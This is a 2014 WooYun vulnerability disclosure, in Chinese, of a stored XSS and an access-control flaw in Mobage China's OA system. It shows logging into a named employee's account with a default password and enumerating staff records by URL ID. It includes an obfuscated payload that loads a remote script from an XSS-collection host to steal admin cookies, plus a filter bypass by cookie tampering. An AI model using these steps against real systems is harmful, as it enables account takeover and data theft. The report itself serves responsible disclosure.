当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071930

漏洞标题:梦宝谷公司OA系统存储型xss&敏感信息泄露

相关厂商:mobage.cn

漏洞作者: DBA

提交时间:2014-08-11 14:42

修复时间:2014-09-25 14:44

公开时间:2014-09-25 14:44

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-11: 细节已通知厂商并且等待厂商处理中
2014-08-11: 厂商已经确认,细节仅向厂商公开
2014-08-21: 细节向核心白帽子及相关领域专家公开
2014-08-31: 细节向普通白帽子公开
2014-09-10: 细节向实习白帽子公开
2014-09-25: 细节向公众公开

简要描述:

1、URL遍历能抓出公司所有员工部分信息
2、存储型xss可获取后台管理员账户信息

详细说明:

搜了下梦宝谷,貌似是dena旗下的一个平台。今天发现了对外的OA系统的一个存储型xss。
OA地址是http://system.denachina.com/mobage_oa/

QQ20140811-1.png


以@dena.com作为关键字在百度里搜,得到一些用户名,比如haiyue.zheng@dena.com,然后尝试使用默认密码123456登录,成功。
在浏览了里面的功能之后发现两个问题
1、越权访问
申请列表可以遍历。
http://system.denachina.com/mobage_oa/index.php/user/absence_info/6653
通过改变后面数字,遍历到所有公司员工姓名、邮箱地址以及管理级别人员信息。
如图

QQ20140811-2.png


2、存储型xss
F12工具,看到cookie信息里记录了md5_password,没有http only于是开始找xss。
在申请加班处,备注内容过滤不完整,加入xss语句。

<img srx=x onerror='window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,97,110,46,99,111,109,47,88,66,85,67,69,122);document.body.appendChild(window.s)'>


经过测试,发现会有XSS的过滤,Burp Suit抓包,最后提交的数据并不是直接过滤,而似乎是先临时存放到一张表,然后判断里面数据是否有代码注入,然后再决定取舍。
发现当提交的内容中含有部分过滤关键字时候,cookie字段中会少掉flash:old:ab_temp_id,p_1_temp_id等字段。于是抓包补上,最后提交成功,形成存储型xss。

ci_session=a:7:{s:10:"session_id";s:32:"594b9c4d97f0a8de9b8937c75312b573";s:10:"ip_address";s:13:"x.x.x.x";s:10:"user_agent";s:85:"Mozilla/5.0+(X11;+Linux+x86_64;+rv:24.0)+Gecko/20140610+Firefox/24.0+Iceweasel/24.6.0";s:13:"last_activity";i:1407729901;s:9:"user_data";s:0:"";s:20:"flash:old:ab_temp_id";i:3319;s:22:"flash:old:ap_1_temp_id";i:3531;}518aecc1d0c2d8033cd2671950c78e98;


http://system.denachina.com/mobage_oa/index.php/user/absence_info/7174
如图

QQ20140811-3.png


QQ20140811-4.png


其实这个xss的形成一是过滤不完善,二是校验逻辑有问题。

漏洞证明:

如上

修复方案:

你们更懂。。

版权声明:转载请注明来源 DBA@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-08-11 15:07

厂商回复:

非常感谢,正在修改。

最新状态:

暂无


漏洞评价:

评论